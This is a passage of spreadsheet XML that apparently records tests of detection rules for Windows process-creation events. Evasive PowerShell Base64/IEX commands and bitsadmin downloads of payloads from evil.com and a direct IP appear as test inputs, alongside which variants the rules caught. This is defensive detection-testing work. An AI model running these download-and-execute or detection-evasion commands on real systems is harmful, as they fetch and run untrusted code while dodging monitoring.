          <t>PowerShell Base64 Encoded FromBase64String Cmdlet</t>
        </is>
      </c>
      <c r="D1675" s="36" t="inlineStr">
        <is>
          <t>fdb62a13-9a81-4e5c-a38f-ea93a16f6d7c</t>
        </is>
      </c>
      <c r="E1675" s="36" t="inlineStr">
        <is>
          <t>powershell.exe -COMMANd "$b64 = 'd2hvYW1p'; [System.Text.Encoding]::UTF8.GetString([System.Convert]::('F'+'romBase64S'+'tring').Invoke($b64)) | iex"</t>
        </is>
      </c>
      <c r="F1675" s="36" t="b">
        <v>1</v>
      </c>
      <c r="G1675" s="36" t="b">
        <v>1</v>
      </c>
      <c r="H1675" s="36" t="b">
        <v>0</v>
      </c>
      <c r="I1675" s="43" t="inlineStr">
        <is>
          <t>Suspicious PowerShell IEX Execution Patterns (09576804-7a05-458e-a817-eb718ca91f54); Suspicious PowerShell IEX Execution Patterns (09576804-7a05-458e-a817-eb718ca91f54)</t>
        </is>
      </c>
      <c r="J1675" s="36" t="n">
        <v>0</v>
      </c>
      <c r="K1675" s="36" t="b">
        <v>0</v>
      </c>
    </row>
    <row r="1676" ht="15.75" customHeight="1" s="42">
      <c r="A1676" s="43" t="n"/>
      <c r="B1676" s="36" t="inlineStr">
        <is>
          <t>proc_creation_win_powershell_base64_frombase64string</t>
        </is>
      </c>
      <c r="C1676" s="36" t="inlineStr">
        <is>
          <t>PowerShell Base64 Encoded FromBase64String Cmdlet</t>
        </is>
      </c>
      <c r="D1676" s="36" t="inlineStr">
        <is>
          <t>fdb62a13-9a81-4e5c-a38f-ea93a16f6d7c</t>
        </is>
      </c>
      <c r="E1676" s="36" t="inlineStr">
        <is>
          <t>powershell.exe -Command "$method = 'From' + 'Base64String'; $payload = [Convert]::$method('d2hvYW1p'); [System.Text.Encoding]::UTF8.GetString($payload) | Invoke-Expression"</t>
        </is>
      </c>
      <c r="F1676" s="36" t="b">
        <v>1</v>
      </c>
      <c r="G1676" s="36" t="b">
        <v>1</v>
      </c>
      <c r="H1676" s="36" t="b">
        <v>1</v>
      </c>
      <c r="I1676" s="36" t="n"/>
      <c r="J1676" s="36" t="n">
        <v>0</v>
      </c>
      <c r="K1676" s="36" t="b">
        <v>1</v>
      </c>
    </row>
    <row r="1677" ht="15.75" customHeight="1" s="42">
      <c r="A1677" s="43" t="n"/>
      <c r="B1677" s="36" t="inlineStr">
        <is>
          <t>proc_creation_win_powershell_base64_frombase64string</t>
        </is>
      </c>
      <c r="C1677" s="36" t="inlineStr">
        <is>
          <t>PowerShell Base64 Encoded FromBase64String Cmdlet</t>
        </is>
      </c>
      <c r="D1677" s="36" t="inlineStr">
        <is>
          <t>fdb62a13-9a81-4e5c-a38f-ea93a16f6d7c</t>
        </is>
      </c>
      <c r="E1677" s="36" t="inlineStr">
        <is>
          <t>powershell.exe -c "$method = 'From' + 'Base64String'; $payload = [Convert]::$method('d2hvYW1p'); [System.Text.Encoding]::UTF8.GetString($payload) | Invoke-Expression"</t>
        </is>
      </c>
      <c r="F1677" s="36" t="b">
        <v>1</v>
      </c>
      <c r="G1677" s="36" t="b">
        <v>1</v>
      </c>
      <c r="H1677" s="36" t="b">
        <v>1</v>
      </c>
      <c r="I1677" s="43" t="n"/>
      <c r="J1677" s="36" t="n">
        <v>0</v>
      </c>
      <c r="K1677" s="36" t="b">
        <v>1</v>
      </c>
    </row>
    <row r="1678" ht="15.75" customHeight="1" s="42">
      <c r="A1678" s="43" t="n"/>
      <c r="B1678" s="36" t="inlineStr">
        <is>
          <t>proc_creation_win_powershell_base64_frombase64string</t>
        </is>
      </c>
      <c r="C1678" s="36" t="inlineStr">
        <is>
          <t>PowerShell Base64 Encoded FromBase64String Cmdlet</t>
        </is>
      </c>
      <c r="D1678" s="36" t="inlineStr">
        <is>
          <t>fdb62a13-9a81-4e5c-a38f-ea93a16f6d7c</t>
        </is>
      </c>
      <c r="E1678" s="36" t="inlineStr">
        <is>
          <t>powershell.exe -COmMAND "$method = 'From' + 'Base64String'; $payload = [Convert]::$method('d2hvYW1p'); [System.Text.Encoding]::UTF8.GetString($payload) | Invoke-Expression"</t>
        </is>
      </c>
      <c r="F1678" s="36" t="b">
        <v>1</v>
      </c>
      <c r="G1678" s="36" t="b">
        <v>1</v>
      </c>
      <c r="H1678" s="36" t="b">
        <v>1</v>
      </c>
      <c r="I1678" s="36" t="n"/>
      <c r="J1678" s="36" t="n">
        <v>0</v>
      </c>
      <c r="K1678" s="36" t="b">
        <v>1</v>
      </c>
    </row>
    <row r="1679" ht="15.75" customHeight="1" s="42">
      <c r="A1679" s="43" t="n"/>
      <c r="B1679" s="36" t="inlineStr">
        <is>
          <t>proc_creation_win_powershell_base64_frombase64string</t>
        </is>
      </c>
      <c r="C1679" s="36" t="inlineStr">
        <is>
          <t>PowerShell Base64 Encoded FromBase64String Cmdlet</t>
        </is>
      </c>
      <c r="D1679" s="36" t="inlineStr">
        <is>
          <t>fdb62a13-9a81-4e5c-a38f-ea93a16f6d7c</t>
        </is>
      </c>
      <c r="E1679" s="36" t="inlineStr">
        <is>
          <t>powershell.exe -Command "[Convert]::FromBase64String('d2hvYW1p')\"</t>
        </is>
      </c>
      <c r="F1679" s="36" t="b">
        <v>1</v>
      </c>
      <c r="G1679" s="36" t="b">
        <v>1</v>
      </c>
      <c r="H1679" s="36" t="b">
        <v>0</v>
      </c>
      <c r="I1679" s="36" t="inlineStr">
        <is>
          <t>Base64 Encoded PowerShell Command Detected (e32d4572-9826-4738-b651-95fa63747e8a); Base64 Encoded PowerShell Command Detected (e32d4572-9826-4738-b651-95fa63747e8a)</t>
        </is>
      </c>
      <c r="J1679" s="36" t="n">
        <v>0</v>
      </c>
      <c r="K1679" s="36" t="b">
        <v>0</v>
      </c>
    </row>
    <row r="1680" ht="15.75" customHeight="1" s="42">
      <c r="A1680" s="43" t="n"/>
      <c r="B1680" s="36" t="inlineStr">
        <is>
          <t>proc_creation_win_powershell_base64_frombase64string</t>
        </is>
      </c>
      <c r="C1680" s="36" t="inlineStr">
        <is>
          <t>PowerShell Base64 Encoded FromBase64String Cmdlet</t>
        </is>
      </c>
      <c r="D1680" s="36" t="inlineStr">
        <is>
          <t>fdb62a13-9a81-4e5c-a38f-ea93a16f6d7c</t>
        </is>
      </c>
      <c r="E1680" s="36" t="inlineStr">
        <is>
          <t>powershell.exe -COmMaNd "[Convert]::FromBase64String('d2hvYW1p')\"</t>
        </is>
      </c>
      <c r="F1680" s="36" t="b">
        <v>1</v>
      </c>
      <c r="G1680" s="36" t="b">
        <v>1</v>
      </c>
      <c r="H1680" s="36" t="b">
        <v>0</v>
      </c>
      <c r="I1680" s="36" t="inlineStr">
        <is>
          <t>Base64 Encoded PowerShell Command Detected (e32d4572-9826-4738-b651-95fa63747e8a); Base64 Encoded PowerShell Command Detected (e32d4572-9826-4738-b651-95fa63747e8a)</t>
        </is>
      </c>
      <c r="J1680" s="36" t="n">
        <v>0</v>
      </c>
      <c r="K1680" s="36" t="b">
        <v>0</v>
      </c>
    </row>
    <row r="1681" ht="15.75" customHeight="1" s="42">
      <c r="A1681" s="43" t="n"/>
      <c r="B1681" s="36" t="inlineStr">
        <is>
          <t>proc_creation_win_powershell_base64_frombase64string</t>
        </is>
      </c>
      <c r="C1681" s="36" t="inlineStr">
        <is>
          <t>PowerShell Base64 Encoded FromBase64String Cmdlet</t>
        </is>
      </c>
      <c r="D1681" s="36" t="inlineStr">
        <is>
          <t>fdb62a13-9a81-4e5c-a38f-ea93a16f6d7c</t>
        </is>
      </c>
      <c r="E1681" s="36" t="inlineStr">
        <is>
          <t>powershell.exe -c "[Convert]::FromBase64String('d2hvYW1p')\"</t>
        </is>
      </c>
      <c r="F1681" s="36" t="b">
        <v>1</v>
      </c>
      <c r="G1681" s="36" t="b">
        <v>1</v>
      </c>
      <c r="H1681" s="36" t="b">
        <v>0</v>
      </c>
      <c r="I1681" s="36" t="inlineStr">
        <is>
          <t>Base64 Encoded PowerShell Command Detected (e32d4572-9826-4738-b651-95fa63747e8a); Base64 Encoded PowerShell Command Detected (e32d4572-9826-4738-b651-95fa63747e8a)</t>
        </is>
      </c>
      <c r="J1681" s="36" t="n">
        <v>0</v>
      </c>
      <c r="K1681" s="36" t="b">
        <v>0</v>
      </c>
    </row>
    <row r="1682" ht="15.75" customHeight="1" s="42">
      <c r="A1682" s="43" t="n"/>
      <c r="B1682" s="36" t="inlineStr">
        <is>
          <t>proc_creation_win_powershell_base64_frombase64string</t>
        </is>
      </c>
      <c r="C1682" s="36" t="inlineStr">
        <is>
          <t>PowerShell Base64 Encoded FromBase64String Cmdlet</t>
        </is>
      </c>
      <c r="D1682" s="36" t="inlineStr">
        <is>
          <t>fdb62a13-9a81-4e5c-a38f-ea93a16f6d7c</t>
        </is>
      </c>
      <c r="E1682" s="36" t="inlineStr">
        <is>
          <t>powershell.exe -coMmAnD "[Convert]::FromBase64String('d2hvYW1p')\"</t>
        </is>
      </c>
      <c r="F1682" s="36" t="b">
        <v>1</v>
      </c>
      <c r="G1682" s="36" t="b">
        <v>1</v>
      </c>
      <c r="H1682" s="36" t="b">
        <v>0</v>
      </c>
      <c r="I1682" s="36" t="inlineStr">
        <is>
          <t>Base64 Encoded PowerShell Command Detected (e32d4572-9826-4738-b651-95fa63747e8a); Base64 Encoded PowerShell Command Detected (e32d4572-9826-4738-b651-95fa63747e8a)</t>
        </is>
      </c>
      <c r="J1682" s="36" t="n">
        <v>0</v>
      </c>
      <c r="K1682" s="36" t="b">
        <v>0</v>
      </c>
    </row>
    <row r="1683" ht="15.75" customHeight="1" s="42">
      <c r="A1683" s="43" t="n"/>
      <c r="B1683" s="36" t="inlineStr">
        <is>
          <t>proc_creation_win_powershell_base64_frombase64string</t>
        </is>
      </c>
      <c r="C1683" s="36" t="inlineStr">
        <is>
          <t>PowerShell Base64 Encoded FromBase64String Cmdlet</t>
        </is>
      </c>
      <c r="D1683" s="36" t="inlineStr">
        <is>
          <t>fdb62a13-9a81-4e5c-a38f-ea93a16f6d7c</t>
        </is>
      </c>
      <c r="E1683" s="36" t="inlineStr">
        <is>
          <t>powershell.exe -cOMmand "[Convert]::FromBase64String('d2hvYW1p')\"</t>
        </is>
      </c>
      <c r="F1683" s="36" t="b">
        <v>1</v>
      </c>
      <c r="G1683" s="36" t="b">
        <v>1</v>
      </c>
      <c r="H1683" s="36" t="b">
        <v>0</v>
      </c>
      <c r="I1683" s="36" t="inlineStr">
        <is>
          <t>Base64 Encoded PowerShell Command Detected (e32d4572-9826-4738-b651-95fa63747e8a); Base64 Encoded PowerShell Command Detected (e32d4572-9826-4738-b651-95fa63747e8a)</t>
        </is>
      </c>
      <c r="J1683" s="36" t="n">
        <v>0</v>
      </c>
      <c r="K1683" s="36" t="b">
        <v>0</v>
      </c>
    </row>
    <row r="1684" ht="15.75" customHeight="1" s="42">
      <c r="A1684" s="43" t="n"/>
      <c r="B1684" s="36" t="inlineStr">
        <is>
          <t>proc_creation_win_powershell_base64_frombase64string</t>
        </is>
      </c>
      <c r="C1684" s="36" t="inlineStr">
        <is>
          <t>PowerShell Base64 Encoded FromBase64String Cmdlet</t>
        </is>
      </c>
      <c r="D1684" s="36" t="inlineStr">
        <is>
          <t>fdb62a13-9a81-4e5c-a38f-ea93a16f6d7c</t>
        </is>
      </c>
      <c r="E1684" s="36" t="inlineStr">
        <is>
          <t>powershell.exe -CommaND "[Convert]::FromBase64String('d2hvYW1p')\"</t>
        </is>
      </c>
      <c r="F1684" s="36" t="b">
        <v>1</v>
      </c>
      <c r="G1684" s="36" t="b">
        <v>1</v>
      </c>
      <c r="H1684" s="36" t="b">
        <v>0</v>
      </c>
      <c r="I1684" s="36" t="inlineStr">
        <is>
          <t>Base64 Encoded PowerShell Command Detected (e32d4572-9826-4738-b651-95fa63747e8a); Base64 Encoded PowerShell Command Detected (e32d4572-9826-4738-b651-95fa63747e8a)</t>
        </is>
      </c>
      <c r="J1684" s="36" t="n">
        <v>0</v>
      </c>
      <c r="K1684" s="36" t="b">
        <v>0</v>
      </c>
    </row>
    <row r="1685" ht="15.75" customHeight="1" s="42">
      <c r="A1685" s="43" t="n"/>
      <c r="B1685" s="36" t="inlineStr">
        <is>
          <t>proc_creation_win_powershell_frombase64string</t>
        </is>
      </c>
      <c r="C1685" s="36" t="inlineStr">
        <is>
          <t>Base64 Encoded PowerShell Command Detected</t>
        </is>
      </c>
      <c r="D1685" s="36" t="inlineStr">
        <is>
          <t>e32d4572-9826-4738-b651-95fa63747e8a</t>
        </is>
      </c>
      <c r="E1685" s="36" t="inlineStr">
        <is>
          <t>powershell.exe -Command "$method = 'FromBase' + '64String'; [Convert]::$method('SGVsbG8gV29ybGQ=')"</t>
        </is>
      </c>
      <c r="F1685" s="36" t="b">
        <v>1</v>
      </c>
      <c r="G1685" s="36" t="b">
        <v>1</v>
      </c>
      <c r="H1685" s="36" t="b">
        <v>1</v>
      </c>
      <c r="I1685" s="36" t="n"/>
      <c r="J1685" s="36" t="n">
        <v>0</v>
      </c>
      <c r="K1685" s="36" t="b">
        <v>1</v>
      </c>
    </row>
    <row r="1686" ht="15.75" customHeight="1" s="42">
      <c r="A1686" s="43" t="n"/>
      <c r="B1686" s="36" t="inlineStr">
        <is>
          <t>proc_creation_win_powershell_frombase64string</t>
        </is>
      </c>
      <c r="C1686" s="36" t="inlineStr">
        <is>
          <t>Base64 Encoded PowerShell Command Detected</t>
        </is>
      </c>
      <c r="D1686" s="36" t="inlineStr">
        <is>
          <t>e32d4572-9826-4738-b651-95fa63747e8a</t>
        </is>
      </c>
      <c r="E1686" s="36" t="inlineStr">
        <is>
          <t>powershell.exe -c "$method = 'FromBase' + '64String'; [Convert]::$method('SGVsbG8gV29ybGQ=')"</t>
        </is>
      </c>
      <c r="F1686" s="36" t="b">
        <v>1</v>
      </c>
      <c r="G1686" s="36" t="b">
        <v>1</v>
      </c>
      <c r="H1686" s="36" t="b">
        <v>1</v>
      </c>
      <c r="I1686" s="36" t="n"/>
      <c r="J1686" s="36" t="n">
        <v>0</v>
      </c>
      <c r="K1686" s="36" t="b">
        <v>1</v>
      </c>
    </row>
    <row r="1687" ht="15.75" customHeight="1" s="42">
      <c r="A1687" s="43" t="n"/>
      <c r="B1687" s="36" t="inlineStr">
        <is>
          <t>proc_creation_win_powershell_frombase64string</t>
        </is>
      </c>
      <c r="C1687" s="36" t="inlineStr">
        <is>
          <t>Base64 Encoded PowerShell Command Detected</t>
        </is>
      </c>
      <c r="D1687" s="36" t="inlineStr">
        <is>
          <t>e32d4572-9826-4738-b651-95fa63747e8a</t>
        </is>
      </c>
      <c r="E1687" s="36" t="inlineStr">
        <is>
          <t>powershell.exe -coMManD "$method = 'FromBase' + '64String'; [Convert]::$method('SGVsbG8gV29ybGQ=')"</t>
        </is>
      </c>
      <c r="F1687" s="36" t="b">
        <v>1</v>
      </c>
      <c r="G1687" s="36" t="b">
        <v>1</v>
      </c>
      <c r="H1687" s="36" t="b">
        <v>1</v>
      </c>
      <c r="I1687" s="36" t="n"/>
      <c r="J1687" s="36" t="n">
        <v>0</v>
      </c>
      <c r="K1687" s="36" t="b">
        <v>1</v>
      </c>
    </row>
    <row r="1688" ht="15.75" customHeight="1" s="42">
      <c r="A1688" s="43" t="n"/>
      <c r="B1688" s="36" t="inlineStr">
        <is>
          <t>proc_creation_win_powershell_frombase64string</t>
        </is>
      </c>
      <c r="C1688" s="36" t="inlineStr">
        <is>
          <t>Base64 Encoded PowerShell Command Detected</t>
        </is>
      </c>
      <c r="D1688" s="36" t="inlineStr">
        <is>
          <t>e32d4572-9826-4738-b651-95fa63747e8a</t>
        </is>
      </c>
      <c r="E1688" s="36" t="inlineStr">
        <is>
          <t>powershell.exe -EncodedCommand UwB0AGEAcgB0AC0AUAByAG8AYwBlAHMAcwAgAGMAYQBsAGMALgBlAHgAZQA=</t>
        </is>
      </c>
      <c r="F1688" s="36" t="b">
        <v>1</v>
      </c>
      <c r="G1688" s="36" t="b">
        <v>1</v>
      </c>
      <c r="H1688" s="36" t="b">
        <v>0</v>
      </c>
      <c r="I1688" s="36" t="inlineStr">
        <is>
          <t>Suspicious Encoded PowerShell Command Line (ca2092a1-c273-4878-9b4b-0d60115bf5ea); Suspicious Execution of Powershell with Base64 (fb843269-508c-4b76-8b8d-88679db22ce7)</t>
        </is>
      </c>
      <c r="J1688" s="36" t="n">
        <v>0</v>
      </c>
      <c r="K1688" s="36" t="b">
        <v>0</v>
      </c>
    </row>
    <row r="1689" ht="15.75" customHeight="1" s="42">
      <c r="A1689" s="43" t="n"/>
      <c r="B1689" s="36" t="inlineStr">
        <is>
          <t>proc_creation_win_powershell_frombase64string</t>
        </is>
      </c>
      <c r="C1689" s="36" t="inlineStr">
        <is>
          <t>Base64 Encoded PowerShell Command Detected</t>
        </is>
      </c>
      <c r="D1689" s="36" t="inlineStr">
        <is>
          <t>e32d4572-9826-4738-b651-95fa63747e8a</t>
        </is>
      </c>
      <c r="E1689" s="36" t="inlineStr">
        <is>
          <t>powershell.exe -eNCoDeDcOmmand UwB0AGEAcgB0AC0AUAByAG8AYwBlAHMAcwAgAGMAYQBsAGMALgBlAHgAZQA=</t>
        </is>
      </c>
      <c r="F1689" s="36" t="b">
        <v>1</v>
      </c>
      <c r="G1689" s="36" t="b">
        <v>1</v>
      </c>
      <c r="H1689" s="36" t="b">
        <v>0</v>
      </c>
      <c r="I1689" s="43" t="inlineStr">
        <is>
          <t>Suspicious Encoded PowerShell Command Line (ca2092a1-c273-4878-9b4b-0d60115bf5ea); Suspicious Execution of Powershell with Base64 (fb843269-508c-4b76-8b8d-88679db22ce7)</t>
        </is>
      </c>
      <c r="J1689" s="36" t="n">
        <v>0</v>
      </c>
      <c r="K1689" s="36" t="b">
        <v>0</v>
      </c>
    </row>
    <row r="1690" ht="15.75" customHeight="1" s="42">
      <c r="A1690" s="43" t="n"/>
      <c r="B1690" s="36" t="inlineStr">
        <is>
          <t>proc_creation_win_powershell_frombase64string</t>
        </is>
      </c>
      <c r="C1690" s="36" t="inlineStr">
        <is>
          <t>Base64 Encoded PowerShell Command Detected</t>
        </is>
      </c>
      <c r="D1690" s="36" t="inlineStr">
        <is>
          <t>e32d4572-9826-4738-b651-95fa63747e8a</t>
        </is>
      </c>
      <c r="E1690" s="36" t="inlineStr">
        <is>
          <t>powershell.exe -enc UwB0AGEAcgB0AC0AUAByAG8AYwBlAHMAcwAgAGMAYQBsAGMALgBlAHgAZQA=</t>
        </is>
      </c>
      <c r="F1690" s="36" t="b">
        <v>1</v>
      </c>
      <c r="G1690" s="36" t="b">
        <v>1</v>
      </c>
      <c r="H1690" s="36" t="b">
        <v>0</v>
      </c>
      <c r="I1690" s="43" t="inlineStr">
        <is>
          <t>Suspicious Encoded PowerShell Command Line (ca2092a1-c273-4878-9b4b-0d60115bf5ea); Suspicious Execution of Powershell with Base64 (fb843269-508c-4b76-8b8d-88679db22ce7)</t>
        </is>
      </c>
      <c r="J1690" s="36" t="n">
        <v>0</v>
      </c>
      <c r="K1690" s="36" t="b">
        <v>0</v>
      </c>
    </row>
    <row r="1691" ht="15.75" customHeight="1" s="42">
      <c r="A1691" s="43" t="n"/>
      <c r="B1691" s="36" t="inlineStr">
        <is>
          <t>proc_creation_win_powershell_frombase64string</t>
        </is>
      </c>
      <c r="C1691" s="36" t="inlineStr">
        <is>
          <t>Base64 Encoded PowerShell Command Detected</t>
        </is>
      </c>
      <c r="D1691" s="36" t="inlineStr">
        <is>
          <t>e32d4572-9826-4738-b651-95fa63747e8a</t>
        </is>
      </c>
      <c r="E1691" s="36" t="inlineStr">
        <is>
          <t>powershell.exe -ENcODedCOMMand UwB0AGEAcgB0AC0AUAByAG8AYwBlAHMAcwAgAGMAYQBsAGMALgBlAHgAZQA=</t>
        </is>
      </c>
      <c r="F1691" s="36" t="b">
        <v>1</v>
      </c>
      <c r="G1691" s="36" t="b">
        <v>1</v>
      </c>
      <c r="H1691" s="36" t="b">
        <v>0</v>
      </c>
      <c r="I1691" s="36" t="inlineStr">
        <is>
          <t>Suspicious Encoded PowerShell Command Line (ca2092a1-c273-4878-9b4b-0d60115bf5ea); Suspicious Execution of Powershell with Base64 (fb843269-508c-4b76-8b8d-88679db22ce7)</t>
        </is>
      </c>
      <c r="J1691" s="36" t="n">
        <v>0</v>
      </c>
      <c r="K1691" s="36" t="b">
        <v>0</v>
      </c>
    </row>
    <row r="1692" ht="15.75" customHeight="1" s="42">
      <c r="A1692" s="43" t="n"/>
      <c r="B1692" s="36" t="inlineStr">
        <is>
          <t>proc_creation_win_powershell_frombase64string</t>
        </is>
      </c>
      <c r="C1692" s="36" t="inlineStr">
        <is>
          <t>Base64 Encoded PowerShell Command Detected</t>
        </is>
      </c>
      <c r="D1692" s="36" t="inlineStr">
        <is>
          <t>e32d4572-9826-4738-b651-95fa63747e8a</t>
        </is>
      </c>
      <c r="E1692" s="36" t="inlineStr">
        <is>
          <t>powershell.exe -enCodedCoMmAnD UwB0AGEAcgB0AC0AUAByAG8AYwBlAHMAcwAgAGMAYQBsAGMALgBlAHgAZQA=</t>
        </is>
      </c>
      <c r="F1692" s="36" t="b">
        <v>1</v>
      </c>
      <c r="G1692" s="36" t="b">
        <v>1</v>
      </c>
      <c r="H1692" s="36" t="b">
        <v>0</v>
      </c>
      <c r="I1692" s="36" t="inlineStr">
        <is>
          <t>Suspicious Encoded PowerShell Command Line (ca2092a1-c273-4878-9b4b-0d60115bf5ea); Suspicious Execution of Powershell with Base64 (fb843269-508c-4b76-8b8d-88679db22ce7)</t>
        </is>
      </c>
      <c r="J1692" s="36" t="n">
        <v>0</v>
      </c>
      <c r="K1692" s="36" t="b">
        <v>0</v>
      </c>
    </row>
    <row r="1693" ht="15.75" customHeight="1" s="42">
      <c r="A1693" s="43" t="inlineStr">
        <is>
          <t>t1197</t>
        </is>
      </c>
      <c r="B1693" s="36" t="inlineStr">
        <is>
          <t>proc_creation_win_bitsadmin_download</t>
        </is>
      </c>
      <c r="C1693" s="36" t="inlineStr">
        <is>
          <t>File Download Via Bitsadmin</t>
        </is>
      </c>
      <c r="D1693" s="36" t="inlineStr">
        <is>
          <t>d059842b-6b9d-4ed1-b5c3-5b89143c6ede</t>
        </is>
      </c>
      <c r="E1693" s="36" t="inlineStr">
        <is>
          <t>bitsadmin.exe	/transfer	myJob	http://evil.com/payload.exe	C:\temp\payload.exe</t>
        </is>
      </c>
      <c r="F1693" s="36" t="b">
        <v>1</v>
      </c>
      <c r="G1693" s="36" t="b">
        <v>1</v>
      </c>
      <c r="H1693" s="36" t="b">
        <v>1</v>
      </c>
      <c r="I1693" s="43" t="n"/>
      <c r="J1693" s="36" t="n">
        <v>1</v>
      </c>
      <c r="K1693" s="36" t="b">
        <v>1</v>
      </c>
    </row>
    <row r="1694" ht="15.75" customHeight="1" s="42">
      <c r="A1694" s="43" t="n"/>
      <c r="B1694" s="36" t="inlineStr">
        <is>
          <t>proc_creation_win_bitsadmin_download_direct_ip</t>
        </is>
      </c>
      <c r="C1694" s="36" t="inlineStr">
        <is>
          <t>Suspicious Download From Direct IP Via Bitsadmin</t>
        </is>
      </c>
      <c r="D1694" s="36" t="inlineStr">
        <is>
          <t>99c840f2-2012-46fd-9141-c761987550ef</t>
        </is>
      </c>
      <c r="E1694" s="36" t="inlineStr">
        <is>
          <t>bitsadmin /transfer downloadJob http://010.0.0.1/malicious.exe C:\Windows\Temp\malicious.exe</t>
        </is>
      </c>
      <c r="F1694" s="36" t="b">
        <v>1</v>
      </c>
      <c r="G1694" s="36" t="b">
        <v>1</v>
      </c>
      <c r="H1694" s="36" t="b">
        <v>0</v>
      </c>
      <c r="I1694" s="36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694" s="36" t="n">
        <v>0</v>
      </c>
      <c r="K1694" s="36" t="b">
        <v>0</v>
      </c>
    </row>
    <row r="1695" ht="15.75" customHeight="1" s="42">
      <c r="A1695" s="43" t="n"/>
      <c r="B1695" s="36" t="inlineStr">
        <is>
          <t>proc_creation_win_bitsadmin_download_direct_ip</t>
        </is>
      </c>
      <c r="C1695" s="36" t="inlineStr">
        <is>
          <t>Suspicious Download From Direct IP Via Bitsadmin</t>
        </is>
      </c>
      <c r="D1695" s="36" t="inlineStr">
        <is>
          <t>99c840f2-2012-46fd-9141-c761987550ef</t>
        </is>
      </c>
      <c r="E1695" s="43" t="inlineStr">
        <is>
          <t>bitsadmin /"transfer" downloadJob http://010.0.0.1/malicious.exe C:\Windows\Temp\malicious.exe</t>
        </is>
      </c>
      <c r="F1695" s="43" t="b">
        <v>1</v>
      </c>
      <c r="G1695" s="43" t="b">
        <v>1</v>
      </c>
      <c r="H1695" s="43" t="b">
        <v>1</v>
      </c>
      <c r="I1695" s="43" t="n"/>
      <c r="J1695" s="43" t="n">
        <v>0</v>
      </c>
      <c r="K1695" s="43" t="b">
        <v>1</v>
      </c>
    </row>
    <row r="1696" ht="15.75" customHeight="1" s="42">
      <c r="A1696" s="43" t="n"/>
      <c r="B1696" s="43" t="inlineStr">
        <is>
          <t>proc_creation_win_bitsadmin_download_direct_ip</t>
        </is>
      </c>
      <c r="C1696" s="43" t="inlineStr">
        <is>
          <t>Suspicious Download From Direct IP Via Bitsadmin</t>
        </is>
      </c>
      <c r="D1696" s="43" t="inlineStr">
        <is>
          <t>99c840f2-2012-46fd-9141-c761987550ef</t>
        </is>
      </c>
      <c r="E1696" s="43" t="inlineStr">
        <is>
          <t>bitsadmin /TRAnsFER downloadJob http://010.0.0.1/malicious.exe C:\Windows\Temp\malicious.exe</t>
        </is>
      </c>
      <c r="F1696" s="43" t="b">
        <v>1</v>
      </c>
      <c r="G1696" s="43" t="b">
        <v>1</v>
      </c>
      <c r="H1696" s="43" t="b">
        <v>0</v>
      </c>
      <c r="I1696" s="4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696" s="43" t="n">
        <v>0</v>
      </c>
      <c r="K1696" s="43" t="b">
        <v>0</v>
      </c>
    </row>
    <row r="1697" ht="15.75" customHeight="1" s="42">
      <c r="A1697" s="36" t="n"/>
      <c r="B1697" s="36" t="inlineStr">
        <is>
          <t>proc_creation_win_bitsadmin_download_direct_ip</t>
        </is>
      </c>
      <c r="C1697" s="36" t="inlineStr">
        <is>
          <t>Suspicious Download From Direct IP Via Bitsadmin</t>
        </is>
      </c>
      <c r="D1697" s="36" t="inlineStr">
        <is>
          <t>99c840f2-2012-46fd-9141-c761987550ef</t>
        </is>
      </c>
      <c r="E1697" s="36" t="inlineStr">
        <is>
          <t>bitsadmin -"transfer" downloadJob http://010.0.0.1/malicious.exe C:\Windows\Temp\malicious.exe</t>
        </is>
      </c>
      <c r="F1697" s="36" t="b">
        <v>1</v>
      </c>
      <c r="G1697" s="36" t="b">
        <v>1</v>
      </c>
      <c r="H1697" s="36" t="b">
        <v>1</v>
      </c>
      <c r="I1697" s="43" t="n"/>
      <c r="J1697" s="36" t="n">
        <v>0</v>
      </c>
      <c r="K1697" s="36" t="b">
        <v>1</v>
      </c>
    </row>
    <row r="1698" ht="15.75" customHeight="1" s="42">
      <c r="A1698" s="43" t="n"/>
      <c r="B1698" s="36" t="inlineStr">
        <is>
          <t>proc_creation_win_bitsadmin_download_direct_ip</t>
        </is>
      </c>
      <c r="C1698" s="36" t="inlineStr">
        <is>
          <t>Suspicious Download From Direct IP Via Bitsadmin</t>
        </is>
      </c>
      <c r="D1698" s="36" t="inlineStr">
        <is>
          <t>99c840f2-2012-46fd-9141-c761987550ef</t>
        </is>
      </c>
      <c r="E1698" s="43" t="inlineStr">
        <is>
          <t>bitsadmin /tRAnsfER downloadJob http://010.0.0.1/malicious.exe C:\Windows\Temp\malicious.exe</t>
        </is>
      </c>
      <c r="F1698" s="43" t="b">
        <v>1</v>
      </c>
      <c r="G1698" s="43" t="b">
        <v>1</v>
      </c>
      <c r="H1698" s="43" t="b">
        <v>0</v>
      </c>
      <c r="I1698" s="4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698" s="43" t="n">
        <v>0</v>
      </c>
      <c r="K1698" s="43" t="b">
        <v>0</v>
      </c>
    </row>
    <row r="1699" ht="15.75" customHeight="1" s="42">
      <c r="A1699" s="43" t="n"/>
      <c r="B1699" s="36" t="inlineStr">
        <is>
          <t>proc_creation_win_bitsadmin_download_direct_ip</t>
        </is>
      </c>
      <c r="C1699" s="36" t="inlineStr">
        <is>
          <t>Suspicious Download From Direct IP Via Bitsadmin</t>
        </is>
      </c>
      <c r="D1699" s="36" t="inlineStr">
        <is>
          <t>99c840f2-2012-46fd-9141-c761987550ef</t>
        </is>
      </c>
      <c r="E1699" s="36" t="inlineStr">
        <is>
          <t>bitsadmin /tRANSfEr downloadJob http://010.0.0.1/malicious.exe C:\Windows\Temp\malicious.exe</t>
        </is>
      </c>
      <c r="F1699" s="36" t="b">
        <v>1</v>
      </c>
      <c r="G1699" s="36" t="b">
        <v>1</v>
      </c>
      <c r="H1699" s="36" t="b">
        <v>0</v>
      </c>
      <c r="I1699" s="43" t="inlineStr">
        <is>
          <t>File Download Via Bitsadmin To A Suspicious Target Folder (2ddef153-167b-4e89-86b6-757a9e65dcac); File Download Via Bitsadmin (d059842b-6b9d-4ed1-b5c3-5b89143c6ede); File Download Via Bitsadmin To An Uncommon Target Folder (6e30c82f-a9f8-4aab-b79c-7c12bce6f248)</t>
        </is>
      </c>
      <c r="J1699" s="36" t="n">
        <v>0</v>
      </c>
      <c r="K1699" s="36" t="b">
        <v>0</v>
      </c>
    </row>
    <row r="1700" ht="15.75" customHeight="1" s="42">
      <c r="A1700" s="43" t="n"/>
      <c r="B1700" s="36" t="inlineStr">
        <is>
          <t>proc_creation_win_bitsadmin_download_file_sharing_domains</t>
        </is>
      </c>
      <c r="C1700" s="36" t="inlineStr">
        <is>
          <t>Suspicious Download From File-Sharing Website Via Bitsadmin</t>
        </is>
      </c>
      <c r="D1700" s="36" t="inlineStr">
        <is>
